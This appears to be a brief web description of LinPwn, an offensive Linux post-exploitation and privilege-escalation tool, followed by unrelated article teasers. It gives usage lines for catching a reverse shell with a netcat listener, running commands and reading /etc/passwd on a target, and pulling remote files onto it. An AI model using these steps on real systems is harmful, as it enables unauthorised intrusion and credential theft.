LinPwn is a interactive tool created to assist you in post exploitation enumeration and privilege escalation.
Connection
nc -lvp PORT on your machine and then run LinPwn on the target machine to get a connection.(LinPwn: Shell) > id(LinPwn: ReadFile)> /etc/passwd(LinPwn) > enumerate(LinPwn: Download) > https://exampleurl.com/file_to_downloadI included a file called build.sh this is optional run bash build.sh to view the build options if you wish to use them.
Journalists use OSINT to verify public information before publishing. In 2026, misinformation, AI-generated images, fake…
Docker is an open-source platform that lets you package and run applications inside containers. Each container…
PostgreSQL (often called Postgres) is an open-source relational database system. It supports advanced features like JSON…
Xrdp is an open-source server that lets you connect to your Ubuntu machine from another computer…
Apache Tomcat is an open-source web server and Java servlet container. It is one of the…
Keeping your Ubuntu system updated is one of the best ways to protect it. Security…